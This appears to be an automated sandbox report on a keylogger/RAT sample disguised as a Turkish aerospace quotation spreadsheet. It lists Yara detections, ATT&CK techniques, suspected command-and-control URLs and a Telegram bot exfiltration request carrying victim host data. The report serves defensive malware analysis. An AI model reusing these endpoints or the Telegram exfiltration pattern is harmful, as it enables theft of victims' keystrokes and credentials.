Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

Remote Access Functionality

Yara detected Snake Keylogger

Source: Yara match

File source: 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Telegram RAT

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

Yara detected VIP Keylogger

Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19008fb50.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe.2a19004cb08.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe PID: 6740, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegAsm.exe PID: 3344, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 DLL Side-Loading	311 Process Injection	1 Disable or Modify Tools	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Screen Capture	1 Web Service	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	1 Input Capture	1 Process Discovery	Remote Desktop Protocol	1 Email Collection	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	311 Process Injection	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Input Capture	3 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	1 Deobfuscate/Decode Files or Information	NTDS	1 Application Window Discovery	Distributed Component Object Model	11 Archive Collected Data	3 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	2 Obfuscated Files or Information	LSA Secrets	1 System Network Configuration Discovery	SSH	1 Data from Local System	14 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Software Packing	Cached Domain Credentials	13 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 DLL Side-Loading	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	53%	ReversingLabs	Win64.Spyware.Snakekeylogger
TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	100%	Joe Sandbox ML

Name	IP	Active	Malicious	Reputation
reallyfreegeoip.org	104.21.67.152	true	false	high
api.telegram.org	149.154.167.220	true	false	high
checkip.dyndns.com	132.226.8.169	true	false	high
checkip.dyndns.org	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
https://reallyfreegeoip.org/xml/8.46.123.189	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20and%20Time:%2014/12/2024%20/%2016:26:30%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20562258%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D	false	high
http://checkip.dyndns.org/	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Reputation
https://www.office.com/	RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003212000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/chrome_newtab	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/ac/?q=	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org	RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://www.office.com/lB	RegAsm.exe, 00000003.00000002.4019025145.000000000321C000.00000004.00000800.00020000.00000000.sdmp	false	high
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://upx.sf.net	Amcache.hve.7.dr	false	high
http://checkip.dyndns.org	RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=	RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=en	RegAsm.exe, 00000003.00000002.4019025145.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003221000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000031E1000.00000004.00000800.00020000.00000000.sdmp	false	high
https://www.ecosia.org/newtab/	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://varders.kozow.com:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
http://aborters.duckdns.org:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ac.ecosia.org/autocomplete?q=	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://anotherarmy.dns.army:8081	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://checkip.dyndns.org/q	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://chrome.google.com/webstore?hl=enlB	RegAsm.exe, 00000003.00000002.4019025145.00000000031EB000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/8.46.123.189$	RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030A9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmp	false	high
https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:562258%0D%0ADate%20a	RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org	RegAsm.exe, 00000003.00000002.4019025145.0000000003116000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.00000000030EE000.00000004.00000800.00020000.00000000.sdmp	false	high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	RegAsm.exe, 00000003.00000002.4019025145.0000000003031000.00000004.00000800.00020000.00000000.sdmp	false	high
https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=	RegAsm.exe, 00000003.00000002.4021377725.0000000004051000.00000004.00000800.00020000.00000000.sdmp	false	high
http://51.38.247.67:8081/_send_.php?LCapplication/x-www-form-urlencoded	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp	false	high
https://reallyfreegeoip.org/xml/	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe, 00000000.00000002.1669636704.000002A190007000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4017773009.0000000000402000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.4019025145.000000000307F000.00000004.00000800.00020000.00000000.sdmp	false	high

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
132.226.8.169	checkip.dyndns.com	United States	16989	UTMEMUS	false
149.154.167.220	api.telegram.org	United Kingdom	62041	TELEGRAMRU	false
104.21.67.152	reallyfreegeoip.org	United States	13335	CLOUDFLARENETUS	false

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1574855
Start date and time:	2024-12-13 17:46:13 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 8m 5s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	13
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe renamed because original name is a hash value
Original Sample Name:	TEKLF STE - TUSA TRK HAVACILIK UZAY SANAY_xlsx.exe
Detection:	MAL
Classification:	mal100.troj.spyw.expl.evad.winEXE@7/5@3/3
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 92% Number of executed functions: 69 Number of non-executed functions: 3
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 20.42.65.92, 20.190.181.5, 4.245.163.56, 20.109.210.53, 13.107.246.63
Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target RegAsm.exe, PID 3344 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Report size getting too big, too many NtSetInformationFile calls found.
VT rate limit hit for: TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe

Simulations

Behavior and APIs

Time	Type	Description
11:47:32	API Interceptor	10324803x Sleep call for process: RegAsm.exe modified
11:47:38	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
132.226.8.169	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	checkip.dyndns.org/
	file.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	Price Quotation-01.dqy.dll	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	ORDER-6070Y689_0PF57682456_DECVC789378909740.js	Get hash	malicious	WSHRat, Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	172.67.177.134
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	172.67.177.134
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
api.telegram.org	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	888.exe	Get hash	malicious	Luca Stealer	Browse	149.154.167.220
	888.exe	Get hash	malicious	Luca Stealer	Browse	149.154.167.220
	https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	installer.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	file.exe	Get hash	malicious	Amadey	Browse	149.154.167.99
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	888.exe	Get hash	malicious	Luca Stealer	Browse	149.154.167.220
	888.exe	Get hash	malicious	Luca Stealer	Browse	149.154.167.220
	https://grizzled-overjoyed-bag.glitch.me/#comercial.portugal@eurofred.com	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	XClient.exe	Get hash	malicious	XWorm	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Discord Token Stealer, Millenuim RAT	Browse	149.154.167.220
	file.exe	Get hash	malicious	Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
	file.exe	Get hash	malicious	Amadey, LummaC Stealer, Stealc, Vidar, Xmrig	Browse	149.154.167.99
UTMEMUS	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	malware.ps1	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Shipping Documents.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	QUOTES REQUEST FOR PRICES.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Bank Swift and SOA PVRN0072700314080353_pdf.exe	Get hash	malicious	GuLoader, MassLogger RAT	Browse	132.226.8.169
	DEC 2024 RFQ.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	file.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.8.169
	Request for quote.doc	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	ST07933.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	132.226.8.169

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	77541373_BESOZT00_2024_99101234_1_4_1.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	Bloxflip Predictor.exe	Get hash	malicious	Njrat	Browse	104.21.67.152
	CVmkXJ7e0a.exe	Get hash	malicious	SheetRat	Browse	104.21.67.152
	Ziraat Bankasi Swift Mesaji.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	TEKL#U0130F #U0130STE#U011e#U0130 - TUSA#U015e T#U00dcRK HAVACILIK UZAY SANAY#U0130#U0130_xlsx.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Request for Quotations and specifications.pdf.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	hesaphareketi-01.pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	hesaphareketi-01.pdfsxlx..exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	41570002689_20220814_05352297_HesapOzeti.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	adv.ps1	Get hash	malicious	LummaC	Browse	149.154.167.220
	d2W4YpqsKg.lnk	Get hash	malicious	LummaC	Browse	149.154.167.220
	HSBC Payment Notification Scan Copy Ref 62587299-24_PDF.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	https://nam.dcv.ms/0CX72Iqyxf	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	https://go.eu.sparkpostmail1.com/f/a/IgPiUnQgGsgttR90IQc-hw~~/AAGCxAA~/RgRpOpvrP0QqaHR0cHM6Ly9tYXNzd29vZHBvbGlzaC5pbi93YXRlci9jb2xkL2luZGV4VwVzcGNldUIKZ1XrFlhnca8zKlISemFyZ2FyQGZhcmlkZWEuY29tWAQAAAAB#YmlsbC5ob2l0dEBwYXJ0bmVyc21ndS5jb20=	Get hash	malicious	HTMLPhisher	Browse	149.154.167.220
	pxGom77XRW.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	GSAT3WdrJ8.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	YRhWQcRXWV.doc	Get hash	malicious	Unknown	Browse	149.154.167.220
	FINAL_PDF.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Filezilla.exe	Get hash	malicious	Unknown	Browse	149.154.167.220

Dropped Files

⊘No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_TEKL#U0130F #U01_4d817154e7317f6556f21a981843090bab0f495_0d25fb3a_078ba47d-8192-46dd-95c3-e9b5d776b9e0\Report.wer

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	1.0595186097257405
Encrypted:	false
SSDEEP:	192:gvsf6XXSXSNd5/0UnUhSvSbaWB2WPzuiFJ3Z24lO8pSj:J6X1dSUnUVam24zuiFJ3Y4lO8e
MD5:	6A327E1D323E65C3635D9F70FBD12837
SHA1:	455532DBF8CA1281227F08B49881691DD64014CF
SHA-256:	3C08F75F991470E8204EC380C828768C9410E9F7F4E9049BA215622C3F8CDCFB
SHA-512:	E5AF78A2FCA5E3825663679CEF2D93116EEA8DC01669B2F51903B8A2846D3A82D8BFE017C68254465A3EBEF25B1C5B673CDC13816E9CC183B3CC923C81951A12
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.8.5.8.2.0.4.7.7.2.1.7.4.1.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.8.5.8.2.0.4.8.3.6.2.3.7.0.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.0.7.8.b.a.4.7.d.-.8.1.9.2.-.4.6.d.d.-.9.5.c.3.-.e.9.b.5.d.7.7.6.b.9.e.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.6.e.c.f.7.6.2.-.a.2.5.3.-.4.8.e.d.-.9.5.8.9.-.2.0.7.e.7.8.9.e.0.3.1.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.T.E.K.L.#.U.0.1.3.0.F. .#.U.0.1.3.0.S.T.E.#.U.0.1.1.e.#.U.0.1.3.0. .-. .T.U.S.A.#.U.0.1.5.e. .T.#.U.0.0.d.c.R.K. .H.A.V.A.C.I.L.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.K.a.t.s.i.n.a...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.5.4.-.0.0.0.1.-.0.0.1.4.-.2.b.8.a.-.7.a.b.0.7.e.4.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.d.c.b.f.4.1.1.f.6.6.d.4.5.5.e.6.0.e.4.3.6.2.c.d.b.d.5.d.b.0.a.0.0.0.0.0.0.0.0.!.0.0.0.0.8.8.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8D7A.tmp.dmp

Download File

Process:	C:\Windows\System32\WerFault.exe
File Type:	Mini DuMP crash report, 16 streams, Fri Dec 13 16:47:28 2024, 0x1205a4 type
Category:	dropped
Size (bytes):	373634
Entropy (8bit):	3.3170227803978936
Encrypted:	false
SSDEEP:	3072:W5P4bsY4uKcS1lWoeoo23lZPct1CCqrGr03+vWy9:Aw16hPZUlqf3Qj
MD5:	ACCBB5F0FB90DA84A555438A514BC588
SHA1:	D6C5CEDB60FE6BE3ED4DC87AA968F92D72B68F78
SHA-256:	595D0DE7BAD9B7EFD632881F225E44030F7CCA01B5DE282CD9F7A7FFAB13FDBC
SHA-512:	71646DF5226FA4DE22CC0FAD8CDB4CF71C5DA65626D25924473A5C9E26535DC9A0C23BA273E6603ABA19B1DDA3925485980A92449BB5D77C592FA0CE46A10C83
Malicious:	false
Reputation:	low
Preview:	MDMP..a..... ....... e\g....................................$...h.......(............C...n..........l.......8...........T............(...............5...........7..............................................................................eJ......88......Lw......................T.......T....e\g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER8EF2.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\System32\WerFault.exe
